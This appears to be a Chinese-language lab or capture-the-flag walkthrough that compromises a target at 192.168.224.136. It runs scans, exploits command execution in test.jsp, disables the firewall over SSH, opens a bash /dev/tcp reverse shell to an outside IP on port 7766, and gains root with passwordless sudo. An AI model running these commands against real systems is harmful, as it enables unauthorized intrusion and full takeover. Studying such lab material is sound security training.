主机发现
arp-scan -l
端口扫描
nmap -sV -sC -sT -O 192.168.224.136 -p-
目录扫描
dirb http://192.168.224.136:8080
dirsearch -u http://192.168.224.136:8080
# 因为只开启了8080端口,所以目录扫描的时候加上8080
两种扫描分别扫到 /manager 和 /test.jsp 和 /index.html
浏览器访问
根据提示输入 ls -l /tmp 发现可以执行
ls -l /tmp
尝试输入 ls -l /home,
ls -l /home
发现一个 bill 用户
ps -aux # 查看一下进程
发现 sshd 正在使用中,可能是被防火墙限制了,可以尝试关闭防火墙
ssh bill@localhost sudo ufw disable
反弹shell
利用ssh反弹shell
ssh bill@localhost bash -i>& /dev/tcp/47.95.210.94/7766 0>&1
# ip是云服务器或者kali
远程服务器或kali 开启 7766监听端口
nc -lvvp 7766
成功反弹到shell
提权
sudo -l
从NOPASSWD中,可以看出切换root 不需要密码直接sudo su
sudo su
提权成功